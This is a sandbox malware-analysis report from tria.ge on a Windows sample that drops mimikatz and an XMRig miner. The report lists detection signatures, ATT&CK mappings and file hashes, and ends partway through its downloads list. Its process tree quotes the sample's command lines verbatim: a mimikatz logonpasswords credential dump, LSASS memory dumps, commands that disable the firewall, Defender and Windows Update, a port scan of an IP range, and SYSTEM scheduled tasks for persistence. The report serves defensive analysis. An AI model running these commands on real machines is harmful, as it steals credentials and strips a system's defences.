Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Overview

overview

10

Static

static

10

bea313368e...6N.exe

windows7-x64

10

bea313368e...6N.exe

windows10-2004-x64

10

Analysis

  • max time kernel
    120s
  • max time network
    127s
  • platform
    windows7_x64
  • resource
    win7-20241010-en
  • resource tags

    arch:x64arch:x86image:win7-20241010-enlocale:en-usos:windows7-x64system
  • submitted
    15/10/2024, 02:14

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    bea313368ef8063b923d61a3e152b85375b32c4b21cc5dd0f8e68344ebd7d636N.exe

  • Size

    7.6MB

  • MD5

    9b1817a2ee30bbbce35c481b8afa4960

  • SHA1

    fec68058190c48b15e3edc07ab9a888387913e1d

  • SHA256

    bea313368ef8063b923d61a3e152b85375b32c4b21cc5dd0f8e68344ebd7d636

  • SHA512

    32dcf046626cc9b211a69eec6eaa672173d6ce723a53be23631796c747a4279c569a73d4019a74fedb9d9cb3428f911b06fb2b6556f7a30e0d8f2ddd4dbb9e6d

  • SSDEEP

    196608:ylTPemknGzwHdOgEPHd9BYX/nivPlTXTYP:a3jz0E52/iv1

Score
10/10
mimikatzxmrigcredential_accessdiscoveryevasionexecutionminerpersistenceprivilege_escalationupx

Malware Config

Signatures

  • Disables service(s) 3 TTPs
    evasionexecution
  • Mimikatz

    mimikatz is an open source tool to dump credentials on Windows.

    mimikatz
  • Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

    minerxmrig
  • OS Credential Dumping: LSASS Memory 1 TTPs

    Malicious access to Credentials History.

    credential_access
  • XMRig Miner payload 6 IoCs
    miner
  • mimikatz is an open source tool to dump credentials on Windows 8 IoCs
  • Drops file in Drivers directory 2 IoCs
  • Event Triggered Execution: Image File Execution Options Injection 1 TTPs 40 IoCs
    persistence
  • Modifies Windows Firewall 2 TTPs 2 IoCs
    evasion
  • Executes dropped EXE 17 IoCs
  • Loads dropped DLL 24 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

    discovery
  • Network Share Discovery 1 TTPs

    Attempt to gather information on host network.

    discovery
  • Creates a Windows Service
    persistence
  • Drops file in System32 directory 8 IoCs
  • UPX packed file 28 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

    upx
  • Drops file in Program Files directory 3 IoCs
  • Drops file in Windows directory 57 IoCs
  • Launches sc.exe 4 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Event Triggered Execution: Netsh Helper DLL 1 TTPs 51 IoCs

    Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

    persistenceprivilege_escalation
  • System Location Discovery: System Language Discovery 1 TTPs 64 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

    discovery
  • System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs

    Adversaries may check for Internet connectivity on compromised systems.

    discovery
  • NSIS installer 3 IoCs
    installer
  • Modifies data under HKEY_USERS 64 IoCs
  • Modifies registry class 14 IoCs
  • Runs net.exe
  • Runs ping.exe 1 TTPs 1 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 3 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

    persistenceexecution
  • Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: LoadsDriver 31 IoCs
  • Suspicious behavior: RenamesItself 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 23 IoCs
  • Suspicious use of SetWindowsHookEx 10 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Windows\System32\spoolsv.exe
    C:\Windows\System32\spoolsv.exe
    1⤵
      PID:768
      • C:\Windows\TEMP\tckjwhyci\aktvci.exe
        "C:\Windows\TEMP\tckjwhyci\aktvci.exe"
        2⤵
        • Executes dropped EXE
        • Suspicious use of AdjustPrivilegeToken
        PID:1716
    • C:\Users\Admin\AppData\Local\Temp\bea313368ef8063b923d61a3e152b85375b32c4b21cc5dd0f8e68344ebd7d636N.exe
      "C:\Users\Admin\AppData\Local\Temp\bea313368ef8063b923d61a3e152b85375b32c4b21cc5dd0f8e68344ebd7d636N.exe"
      1⤵
      • Drops file in Windows directory
      • System Location Discovery: System Language Discovery
      • Suspicious behavior: RenamesItself
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of SetWindowsHookEx
      • Suspicious use of WriteProcessMemory
      PID:2488
      • C:\Windows\SysWOW64\cmd.exe
        cmd /c ping 127.0.0.1 -n 5 & Start C:\Windows\rtldfmcc\nihkvnz.exe
        2⤵
        • Loads dropped DLL
        • System Location Discovery: System Language Discovery
        • System Network Configuration Discovery: Internet Connection Discovery
        • Suspicious use of WriteProcessMemory
        PID:2864
        • C:\Windows\SysWOW64\PING.EXE
          ping 127.0.0.1 -n 5
          3⤵
          • System Location Discovery: System Language Discovery
          • System Network Configuration Discovery: Internet Connection Discovery
          • Runs ping.exe
          PID:2880
        • C:\Windows\rtldfmcc\nihkvnz.exe
          C:\Windows\rtldfmcc\nihkvnz.exe
          3⤵
          • Executes dropped EXE
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of SetWindowsHookEx
          PID:3036
    • C:\Windows\rtldfmcc\nihkvnz.exe
      C:\Windows\rtldfmcc\nihkvnz.exe
      1⤵
      • Suspicious use of NtCreateUserProcessOtherParentProcess
      • Drops file in Drivers directory
      • Event Triggered Execution: Image File Execution Options Injection
      • Executes dropped EXE
      • Loads dropped DLL
      • Drops file in System32 directory
      • Drops file in Windows directory
      • System Location Discovery: System Language Discovery
      • Modifies data under HKEY_USERS
      • Modifies registry class
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of SetWindowsHookEx
      • Suspicious use of WriteProcessMemory
      PID:2776
      • C:\Windows\SysWOW64\cmd.exe
        cmd /c echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D users & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D administrators & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM
        2⤵
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:3040
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /S /D /c" echo Y"
          3⤵
          • System Location Discovery: System Language Discovery
          PID:636
        • C:\Windows\SysWOW64\cacls.exe
          cacls C:\Windows\system32\drivers\etc\hosts /T /D users
          3⤵
            PID:2792
          • C:\Windows\SysWOW64\cmd.exe
            C:\Windows\system32\cmd.exe /S /D /c" echo Y"
            3⤵
            • System Location Discovery: System Language Discovery
            PID:2884
          • C:\Windows\SysWOW64\cacls.exe
            cacls C:\Windows\system32\drivers\etc\hosts /T /D administrators
            3⤵
            • System Location Discovery: System Language Discovery
            PID:2992
          • C:\Windows\SysWOW64\cmd.exe
            C:\Windows\system32\cmd.exe /S /D /c" echo Y"
            3⤵
            • System Location Discovery: System Language Discovery
            PID:2756
          • C:\Windows\SysWOW64\cacls.exe
            cacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM
            3⤵
            • System Location Discovery: System Language Discovery
            PID:2784
        • C:\Windows\SysWOW64\netsh.exe
          netsh ipsec static del all
          2⤵
          • Event Triggered Execution: Netsh Helper DLL
          • Modifies data under HKEY_USERS
          PID:1996
        • C:\Windows\SysWOW64\netsh.exe
          netsh ipsec static add policy name=Bastards description=FuckingBastards
          2⤵
          • Event Triggered Execution: Netsh Helper DLL
          • System Location Discovery: System Language Discovery
          • Modifies data under HKEY_USERS
          PID:2324
        • C:\Windows\SysWOW64\netsh.exe
          netsh ipsec static add filteraction name=BastardsList action=block
          2⤵
          • Event Triggered Execution: Netsh Helper DLL
          • System Location Discovery: System Language Discovery
          • Modifies data under HKEY_USERS
          PID:2268
        • C:\Windows\SysWOW64\cmd.exe
          cmd /c C:\Windows\ypbgnfgfn\livcfcfiu\wpcap.exe /S
          2⤵
          • Loads dropped DLL
          • System Location Discovery: System Language Discovery
          • Suspicious use of WriteProcessMemory
          PID:1656
          • C:\Windows\ypbgnfgfn\livcfcfiu\wpcap.exe
            C:\Windows\ypbgnfgfn\livcfcfiu\wpcap.exe /S
            3⤵
            • Drops file in Drivers directory
            • Executes dropped EXE
            • Loads dropped DLL
            • Drops file in System32 directory
            • Drops file in Program Files directory
            • System Location Discovery: System Language Discovery
            • Suspicious use of WriteProcessMemory
            PID:944
            • C:\Windows\SysWOW64\net.exe
              net stop "Boundary Meter"
              4⤵
                PID:2336
                • C:\Windows\SysWOW64\net1.exe
                  C:\Windows\system32\net1 stop "Boundary Meter"
                  5⤵
                  • System Location Discovery: System Language Discovery
                  PID:1712
              • C:\Windows\SysWOW64\net.exe
                net stop "TrueSight Meter"
                4⤵
                • System Location Discovery: System Language Discovery
                PID:792
                • C:\Windows\SysWOW64\net1.exe
                  C:\Windows\system32\net1 stop "TrueSight Meter"
                  5⤵
                  • System Location Discovery: System Language Discovery
                  PID:548
              • C:\Windows\SysWOW64\net.exe
                net stop npf
                4⤵
                • System Location Discovery: System Language Discovery
                PID:2372
                • C:\Windows\SysWOW64\net1.exe
                  C:\Windows\system32\net1 stop npf
                  5⤵
                  • System Location Discovery: System Language Discovery
                  PID:2164
              • C:\Windows\SysWOW64\net.exe
                net start npf
                4⤵
                  PID:2236
                  • C:\Windows\SysWOW64\net1.exe
                    C:\Windows\system32\net1 start npf
                    5⤵
                    • System Location Discovery: System Language Discovery
                    PID:2468
            • C:\Windows\SysWOW64\cmd.exe
              cmd /c net start npf
              2⤵
                PID:2200
                • C:\Windows\SysWOW64\net.exe
                  net start npf
                  3⤵
                  • System Location Discovery: System Language Discovery
                  PID:2128
                  • C:\Windows\SysWOW64\net1.exe
                    C:\Windows\system32\net1 start npf
                    4⤵
                    • System Location Discovery: System Language Discovery
                    PID:864
              • C:\Windows\SysWOW64\cmd.exe
                cmd /c net start npf
                2⤵
                • System Location Discovery: System Language Discovery
                PID:2768
                • C:\Windows\SysWOW64\net.exe
                  net start npf
                  3⤵
                  • System Location Discovery: System Language Discovery
                  PID:1104
                  • C:\Windows\SysWOW64\net1.exe
                    C:\Windows\system32\net1 start npf
                    4⤵
                    • System Location Discovery: System Language Discovery
                    PID:1684
              • C:\Windows\SysWOW64\cmd.exe
                cmd /c C:\Windows\ypbgnfgfn\livcfcfiu\rjfiekzcc.exe -p 80 222.186.128.1-222.186.255.255 --rate=1024 -oJ C:\Windows\ypbgnfgfn\livcfcfiu\Scant.txt
                2⤵
                • Loads dropped DLL
                • System Location Discovery: System Language Discovery
                PID:2204
                • C:\Windows\ypbgnfgfn\livcfcfiu\rjfiekzcc.exe
                  C:\Windows\ypbgnfgfn\livcfcfiu\rjfiekzcc.exe -p 80 222.186.128.1-222.186.255.255 --rate=1024 -oJ C:\Windows\ypbgnfgfn\livcfcfiu\Scant.txt
                  3⤵
                  • Executes dropped EXE
                  • Loads dropped DLL
                  • System Location Discovery: System Language Discovery
                  PID:2228
              • C:\Windows\SysWOW64\cmd.exe
                cmd /c C:\Windows\ypbgnfgfn\Corporate\vfshost.exe privilege::debug sekurlsa::logonpasswords exit >> C:\Windows\ypbgnfgfn\Corporate\log.txt
                2⤵
                • Loads dropped DLL
                • Drops file in Windows directory
                • System Location Discovery: System Language Discovery
                PID:940
                • C:\Windows\ypbgnfgfn\Corporate\vfshost.exe
                  C:\Windows\ypbgnfgfn\Corporate\vfshost.exe privilege::debug sekurlsa::logonpasswords exit
                  3⤵
                  • Executes dropped EXE
                  • Suspicious use of AdjustPrivilegeToken
                  PID:1616
              • C:\Windows\SysWOW64\cmd.exe
                cmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "btldecrcl" /ru system /tr "cmd /c C:\Windows\ime\nihkvnz.exe"
                2⤵
                • System Location Discovery: System Language Discovery
                PID:1236
                • C:\Windows\SysWOW64\cmd.exe
                  C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                  3⤵
                  • System Location Discovery: System Language Discovery
                  PID:2244
                • C:\Windows\SysWOW64\schtasks.exe
                  schtasks /create /sc minute /mo 1 /tn "btldecrcl" /ru system /tr "cmd /c C:\Windows\ime\nihkvnz.exe"
                  3⤵
                  • System Location Discovery: System Language Discovery
                  • Scheduled Task/Job: Scheduled Task
                  PID:2916
              • C:\Windows\SysWOW64\cmd.exe
                cmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "fmullgzie" /ru system /tr "cmd /c echo Y|cacls C:\Windows\rtldfmcc\nihkvnz.exe /p everyone:F"
                2⤵
                  PID:1580
                  • C:\Windows\SysWOW64\cmd.exe
                    C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                    3⤵
                    • System Location Discovery: System Language Discovery
                    PID:568
                  • C:\Windows\SysWOW64\schtasks.exe
                    schtasks /create /sc minute /mo 1 /tn "fmullgzie" /ru system /tr "cmd /c echo Y|cacls C:\Windows\rtldfmcc\nihkvnz.exe /p everyone:F"
                    3⤵
                    • Scheduled Task/Job: Scheduled Task
                    PID:2972
                • C:\Windows\SysWOW64\cmd.exe
                  cmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "hyigybsnt" /ru system /tr "cmd /c echo Y|cacls C:\Windows\TEMP\tckjwhyci\aktvci.exe /p everyone:F"
                  2⤵
                  • System Location Discovery: System Language Discovery
                  PID:2620
                  • C:\Windows\SysWOW64\cmd.exe
                    C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                    3⤵
                    • System Location Discovery: System Language Discovery
                    PID:2396
                  • C:\Windows\SysWOW64\schtasks.exe
                    schtasks /create /sc minute /mo 1 /tn "hyigybsnt" /ru system /tr "cmd /c echo Y|cacls C:\Windows\TEMP\tckjwhyci\aktvci.exe /p everyone:F"
                    3⤵
                    • System Location Discovery: System Language Discovery
                    • Scheduled Task/Job: Scheduled Task
                    PID:3012
                • C:\Windows\SysWOW64\netsh.exe
                  netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=139 protocol=TCP
                  2⤵
                  • Event Triggered Execution: Netsh Helper DLL
                  • System Location Discovery: System Language Discovery
                  • Modifies data under HKEY_USERS
                  PID:2076
                • C:\Windows\SysWOW64\netsh.exe
                  netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=139 protocol=UDP
                  2⤵
                  • Event Triggered Execution: Netsh Helper DLL
                  • System Location Discovery: System Language Discovery
                  • Modifies data under HKEY_USERS
                  PID:2992
                • C:\Windows\SysWOW64\netsh.exe
                  netsh ipsec static add rule name=Rule1 policy=Bastards filterlist=BastardsList filteraction=BastardsList
                  2⤵
                  • Event Triggered Execution: Netsh Helper DLL
                  • Modifies data under HKEY_USERS
                  PID:2032
                • C:\Windows\SysWOW64\netsh.exe
                  netsh ipsec static set policy name=Bastards assign=y
                  2⤵
                  • Event Triggered Execution: Netsh Helper DLL
                  • System Location Discovery: System Language Discovery
                  • Modifies data under HKEY_USERS
                  PID:928
                • C:\Windows\SysWOW64\netsh.exe
                  netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=135 protocol=TCP
                  2⤵
                  • Event Triggered Execution: Netsh Helper DLL
                  • System Location Discovery: System Language Discovery
                  • Modifies data under HKEY_USERS
                  PID:2740
                • C:\Windows\SysWOW64\netsh.exe
                  netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=135 protocol=UDP
                  2⤵
                  • Event Triggered Execution: Netsh Helper DLL
                  • System Location Discovery: System Language Discovery
                  • Modifies data under HKEY_USERS
                  PID:1996
                • C:\Windows\SysWOW64\netsh.exe
                  netsh ipsec static add rule name=Rule1 policy=Bastards filterlist=BastardsList filteraction=BastardsList
                  2⤵
                  • Event Triggered Execution: Netsh Helper DLL
                  • Modifies data under HKEY_USERS
                  PID:2324
                • C:\Windows\TEMP\ypbgnfgfn\ctjtihzei.exe
                  C:\Windows\TEMP\ypbgnfgfn\ctjtihzei.exe -accepteula -mp 768 C:\Windows\TEMP\ypbgnfgfn\768.dmp
                  2⤵
                  • Executes dropped EXE
                  • Modifies data under HKEY_USERS
                  • Suspicious use of AdjustPrivilegeToken
                  PID:572
                • C:\Windows\SysWOW64\netsh.exe
                  netsh ipsec static set policy name=Bastards assign=y
                  2⤵
                  • Event Triggered Execution: Netsh Helper DLL
                  • System Location Discovery: System Language Discovery
                  • Modifies data under HKEY_USERS
                  PID:1276
                • C:\Windows\SysWOW64\netsh.exe
                  netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=445 protocol=TCP
                  2⤵
                  • Event Triggered Execution: Netsh Helper DLL
                  • System Location Discovery: System Language Discovery
                  • Modifies data under HKEY_USERS
                  PID:2300
                • C:\Windows\SysWOW64\netsh.exe
                  netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=445 protocol=UDP
                  2⤵
                  • Event Triggered Execution: Netsh Helper DLL
                  • System Location Discovery: System Language Discovery
                  • Modifies data under HKEY_USERS
                  PID:580
                • C:\Windows\SysWOW64\netsh.exe
                  netsh ipsec static add rule name=Rule1 policy=Bastards filterlist=BastardsList filteraction=BastardsList
                  2⤵
                  • Event Triggered Execution: Netsh Helper DLL
                  • System Location Discovery: System Language Discovery
                  • Modifies data under HKEY_USERS
                  PID:1768
                • C:\Windows\SysWOW64\netsh.exe
                  netsh ipsec static set policy name=Bastards assign=y
                  2⤵
                  • Event Triggered Execution: Netsh Helper DLL
                  • Modifies data under HKEY_USERS
                  PID:2504
                • C:\Windows\SysWOW64\cmd.exe
                  cmd /c net stop SharedAccess
                  2⤵
                  • System Location Discovery: System Language Discovery
                  PID:2256
                  • C:\Windows\SysWOW64\net.exe
                    net stop SharedAccess
                    3⤵
                    • System Location Discovery: System Language Discovery
                    PID:1876
                    • C:\Windows\SysWOW64\net1.exe
                      C:\Windows\system32\net1 stop SharedAccess
                      4⤵
                      • System Location Discovery: System Language Discovery
                      PID:2492
                • C:\Windows\SysWOW64\cmd.exe
                  cmd /c netsh firewall set opmode mode=disable
                  2⤵
                  • System Location Discovery: System Language Discovery
                  PID:2220
                  • C:\Windows\SysWOW64\netsh.exe
                    netsh firewall set opmode mode=disable
                    3⤵
                    • Modifies Windows Firewall
                    • Event Triggered Execution: Netsh Helper DLL
                    • System Location Discovery: System Language Discovery
                    • Modifies data under HKEY_USERS
                    PID:892
                • C:\Windows\SysWOW64\cmd.exe
                  cmd /c netsh Advfirewall set allprofiles state off
                  2⤵
                  • System Location Discovery: System Language Discovery
                  PID:1984
                  • C:\Windows\SysWOW64\netsh.exe
                    netsh Advfirewall set allprofiles state off
                    3⤵
                    • Modifies Windows Firewall
                    • Event Triggered Execution: Netsh Helper DLL
                    • System Location Discovery: System Language Discovery
                    • Modifies data under HKEY_USERS
                    PID:864
                • C:\Windows\SysWOW64\cmd.exe
                  cmd /c net stop MpsSvc
                  2⤵
                  • System Location Discovery: System Language Discovery
                  PID:2064
                  • C:\Windows\SysWOW64\net.exe
                    net stop MpsSvc
                    3⤵
                    • System Location Discovery: System Language Discovery
                    PID:2588
                    • C:\Windows\SysWOW64\net1.exe
                      C:\Windows\system32\net1 stop MpsSvc
                      4⤵
                      • System Location Discovery: System Language Discovery
                      PID:2596
                • C:\Windows\SysWOW64\cmd.exe
                  cmd /c net stop WinDefend
                  2⤵
                    PID:2460
                    • C:\Windows\SysWOW64\net.exe
                      net stop WinDefend
                      3⤵
                      • System Location Discovery: System Language Discovery
                      PID:816
                      • C:\Windows\SysWOW64\net1.exe
                        C:\Windows\system32\net1 stop WinDefend
                        4⤵
                        • System Location Discovery: System Language Discovery
                        PID:1764
                  • C:\Windows\SysWOW64\cmd.exe
                    cmd /c net stop wuauserv
                    2⤵
                    • System Location Discovery: System Language Discovery
                    PID:1384
                    • C:\Windows\SysWOW64\net.exe
                      net stop wuauserv
                      3⤵
                        PID:1028
                        • C:\Windows\SysWOW64\net1.exe
                          C:\Windows\system32\net1 stop wuauserv
                          4⤵
                          • System Location Discovery: System Language Discovery
                          PID:1736
                    • C:\Windows\SysWOW64\cmd.exe
                      cmd /c sc config MpsSvc start= disabled
                      2⤵
                        PID:1508
                        • C:\Windows\SysWOW64\sc.exe
                          sc config MpsSvc start= disabled
                          3⤵
                          • Launches sc.exe
                          • System Location Discovery: System Language Discovery
                          PID:1328
                      • C:\Windows\SysWOW64\cmd.exe
                        cmd /c sc config SharedAccess start= disabled
                        2⤵
                          PID:2132
                          • C:\Windows\SysWOW64\sc.exe
                            sc config SharedAccess start= disabled
                            3⤵
                            • Launches sc.exe
                            • System Location Discovery: System Language Discovery
                            PID:804
                        • C:\Windows\SysWOW64\cmd.exe
                          cmd /c sc config WinDefend start= disabled
                          2⤵
                          • System Location Discovery: System Language Discovery
                          PID:2724
                          • C:\Windows\SysWOW64\sc.exe
                            sc config WinDefend start= disabled
                            3⤵
                            • Launches sc.exe
                            • System Location Discovery: System Language Discovery
                            PID:1592
                        • C:\Windows\SysWOW64\cmd.exe
                          cmd /c sc config wuauserv start= disabled
                          2⤵
                          • System Location Discovery: System Language Discovery
                          PID:1496
                          • C:\Windows\SysWOW64\sc.exe
                            sc config wuauserv start= disabled
                            3⤵
                            • Launches sc.exe
                            PID:1064
                        • C:\Windows\TEMP\ypbgnfgfn\ctjtihzei.exe
                          C:\Windows\TEMP\ypbgnfgfn\ctjtihzei.exe -accepteula -mp 1124 C:\Windows\TEMP\ypbgnfgfn\1124.dmp
                          2⤵
                          • Executes dropped EXE
                          • Modifies data under HKEY_USERS
                          • Suspicious use of AdjustPrivilegeToken
                          PID:2912
                        • C:\Windows\TEMP\xohudmc.exe
                          C:\Windows\TEMP\xohudmc.exe
                          2⤵
                          • Executes dropped EXE
                          • Drops file in System32 directory
                          • System Location Discovery: System Language Discovery
                          • Suspicious use of SetWindowsHookEx
                          PID:2612
                        • C:\Windows\TEMP\ypbgnfgfn\ctjtihzei.exe
                          C:\Windows\TEMP\ypbgnfgfn\ctjtihzei.exe -accepteula -mp 1180 C:\Windows\TEMP\ypbgnfgfn\1180.dmp
                          2⤵
                          • Executes dropped EXE
                          • Modifies data under HKEY_USERS
                          • Suspicious use of AdjustPrivilegeToken
                          PID:2876
                        • C:\Windows\TEMP\ypbgnfgfn\ctjtihzei.exe
                          C:\Windows\TEMP\ypbgnfgfn\ctjtihzei.exe -accepteula -mp 1312 C:\Windows\TEMP\ypbgnfgfn\1312.dmp
                          2⤵
                          • Executes dropped EXE
                          • Modifies data under HKEY_USERS
                          • Suspicious use of AdjustPrivilegeToken
                          PID:2820
                        • C:\Windows\TEMP\ypbgnfgfn\ctjtihzei.exe
                          C:\Windows\TEMP\ypbgnfgfn\ctjtihzei.exe -accepteula -mp 1560 C:\Windows\TEMP\ypbgnfgfn\1560.dmp
                          2⤵
                          • Executes dropped EXE
                          • Modifies data under HKEY_USERS
                          • Suspicious use of AdjustPrivilegeToken
                          PID:1856
                        • C:\Windows\TEMP\ypbgnfgfn\ctjtihzei.exe
                          C:\Windows\TEMP\ypbgnfgfn\ctjtihzei.exe -accepteula -mp 1584 C:\Windows\TEMP\ypbgnfgfn\1584.dmp
                          2⤵
                          • Executes dropped EXE
                          • Modifies data under HKEY_USERS
                          • Suspicious use of AdjustPrivilegeToken
                          PID:1564
                        • C:\Windows\TEMP\ypbgnfgfn\ctjtihzei.exe
                          C:\Windows\TEMP\ypbgnfgfn\ctjtihzei.exe -accepteula -mp 2680 C:\Windows\TEMP\ypbgnfgfn\2680.dmp
                          2⤵
                          • Executes dropped EXE
                          • Modifies data under HKEY_USERS
                          • Suspicious use of AdjustPrivilegeToken
                          PID:2000
                        • C:\Windows\TEMP\ypbgnfgfn\ctjtihzei.exe
                          C:\Windows\TEMP\ypbgnfgfn\ctjtihzei.exe -accepteula -mp 2692 C:\Windows\TEMP\ypbgnfgfn\2692.dmp
                          2⤵
                          • Executes dropped EXE
                          • Modifies data under HKEY_USERS
                          • Suspicious use of AdjustPrivilegeToken
                          PID:284
                      • C:\Windows\system32\svchost.exe
                        C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted
                        1⤵
                        • Suspicious use of AdjustPrivilegeToken
                        PID:2364
                      • C:\Windows\SysWOW64\huzbiq.exe
                        C:\Windows\SysWOW64\huzbiq.exe
                        1⤵
                        • Executes dropped EXE
                        • Suspicious use of SetWindowsHookEx
                        PID:2756
                      • C:\Windows\system32\taskeng.exe
                        taskeng.exe {7992D409-5805-4FE5-9E67-78F88167473F} S-1-5-18:NT AUTHORITY\System:Service:
                        1⤵
                          PID:2400
                          • C:\Windows\system32\cmd.EXE
                            C:\Windows\system32\cmd.EXE /c C:\Windows\ime\nihkvnz.exe
                            2⤵
                              PID:2360
                              • C:\Windows\ime\nihkvnz.exe
                                C:\Windows\ime\nihkvnz.exe
                                3⤵
                                • Executes dropped EXE
                                • Suspicious behavior: CmdExeWriteProcessMemorySpam
                                • Suspicious use of SetWindowsHookEx
                                PID:2188
                            • C:\Windows\system32\cmd.EXE
                              C:\Windows\system32\cmd.EXE /c echo Y|cacls C:\Windows\rtldfmcc\nihkvnz.exe /p everyone:F
                              2⤵
                                PID:976
                                • C:\Windows\system32\cmd.exe
                                  C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                                  3⤵
                                    PID:2768
                                  • C:\Windows\system32\cacls.exe
                                    cacls C:\Windows\rtldfmcc\nihkvnz.exe /p everyone:F
                                    3⤵
                                      PID:1684
                                  • C:\Windows\system32\cmd.EXE
                                    C:\Windows\system32\cmd.EXE /c echo Y|cacls C:\Windows\TEMP\tckjwhyci\aktvci.exe /p everyone:F
                                    2⤵
                                      PID:1944
                                      • C:\Windows\system32\cmd.exe
                                        C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                                        3⤵
                                          PID:904
                                        • C:\Windows\system32\cacls.exe
                                          cacls C:\Windows\TEMP\tckjwhyci\aktvci.exe /p everyone:F
                                          3⤵
                                            PID:1208

                                      Network

                                      MITRE ATT&CK Enterprise v15

                                      Reconnaissance

                                      Resource Development

                                      Initial Access

                                      Execution

                                      Scheduled Task/Job

                                      1
                                      T1053

                                      Scheduled Task

                                      1
                                      T1053.005

                                      System Services

                                      1
                                      T1569

                                      Service Execution

                                      1
                                      T1569.002

                                      Persistence

                                      Create or Modify System Process

                                      2
                                      T1543

                                      Windows Service

                                      2
                                      T1543.003

                                      Event Triggered Execution

                                      2
                                      T1546

                                      Image File Execution Options Injection

                                      1
                                      T1546.012

                                      Netsh Helper DLL

                                      1
                                      T1546.007

                                      Scheduled Task/Job

                                      1
                                      T1053

                                      Scheduled Task

                                      1
                                      T1053.005

                                      Privilege Escalation

                                      Create or Modify System Process

                                      2
                                      T1543

                                      Windows Service

                                      2
                                      T1543.003

                                      Event Triggered Execution

                                      2
                                      T1546

                                      Image File Execution Options Injection

                                      1
                                      T1546.012

                                      Netsh Helper DLL

                                      1
                                      T1546.007

                                      Scheduled Task/Job

                                      1
                                      T1053

                                      Scheduled Task

                                      1
                                      T1053.005

                                      Defense Evasion

                                      Impair Defenses

                                      1
                                      T1562

                                      Disable or Modify System Firewall

                                      1
                                      T1562.004

                                      Credential Access

                                      OS Credential Dumping

                                      1
                                      T1003

                                      LSASS Memory

                                      1
                                      T1003.001

                                      Discovery

                                      Network Share Discovery

                                      1
                                      T1135

                                      Query Registry

                                      1
                                      T1012

                                      Remote System Discovery

                                      1
                                      T1018

                                      System Information Discovery

                                      1
                                      T1082

                                      System Location Discovery

                                      1
                                      T1614

                                      System Language Discovery

                                      1
                                      T1614.001

                                      System Network Configuration Discovery

                                      1
                                      T1016

                                      Internet Connection Discovery

                                      1
                                      T1016.001

                                      Lateral Movement

                                      Collection

                                      Command and Control

                                      Exfiltration

                                      Impact

                                      Service Stop

                                      1
                                      T1489

                                      Replay Monitor

                                      Loading Replay Monitor...

                                      Downloads

                                      • C:\Windows\SysWOW64\Packet.dll
                                        Filesize

                                        95KB

                                        MD5

                                        86316be34481c1ed5b792169312673fd

                                        SHA1

                                        6ccde3a8c76879e49b34e4abb3b8dfaf7a9d77b5

                                        SHA256

                                        49656c178b17198470ad6906e9ee0865f16f01c1dbbf11c613b55a07246a7918

                                        SHA512

                                        3a6e77c39942b89f3f149e9527ab8a9eb39f55ac18a9db3a3922dfb294beb0760d10ca12be0e3a3854ff7dabbe2df18c52e3696874623a2a9c5dc74b29a860bc

                                        Download Submit

                                      • C:\Windows\SysWOW64\wpcap.dll
                                        Filesize

                                        275KB

                                        MD5

                                        4633b298d57014627831ccac89a2c50b

                                        SHA1

                                        e5f449766722c5c25fa02b065d22a854b6a32a5b

                                        SHA256

                                        b967e4dce952f9232592e4c1753516081438702a53424005642700522055dbc9

                                        SHA512

                                        29590fa5f72e6a36f2b72fc2a2cca35ee41554e13c9995198e740608975621142395d4b2e057db4314edf95520fd32aae8db066444d8d8db0fd06c391111c6d3

                                        Download Submit

                                      • C:\Windows\TEMP\tckjwhyci\config.json
                                        Filesize

                                        693B

                                        MD5

                                        f2d396833af4aea7b9afde89593ca56e

                                        SHA1

                                        08d8f699040d3ca94e9d46fc400e3feb4a18b96b

                                        SHA256

                                        d6ae7c6275b7a9b81ae4a4662c9704f7a68d5943fcc4b8d035e53db708659b34

                                        SHA512

                                        2f359d080c113d58a67f08cb44d9ab84b0dfd7392d6ddb56ca5d1b0e8aa37b984fac720e4373d4f23db967a3465fcf93cee66d7934d4211a22e1ebc640755f01

                                        Download Submit

                                      • C:\Windows\TEMP\ypbgnfgfn\1124.dmp
                                        Filesize

                                        1.3MB

                                        MD5

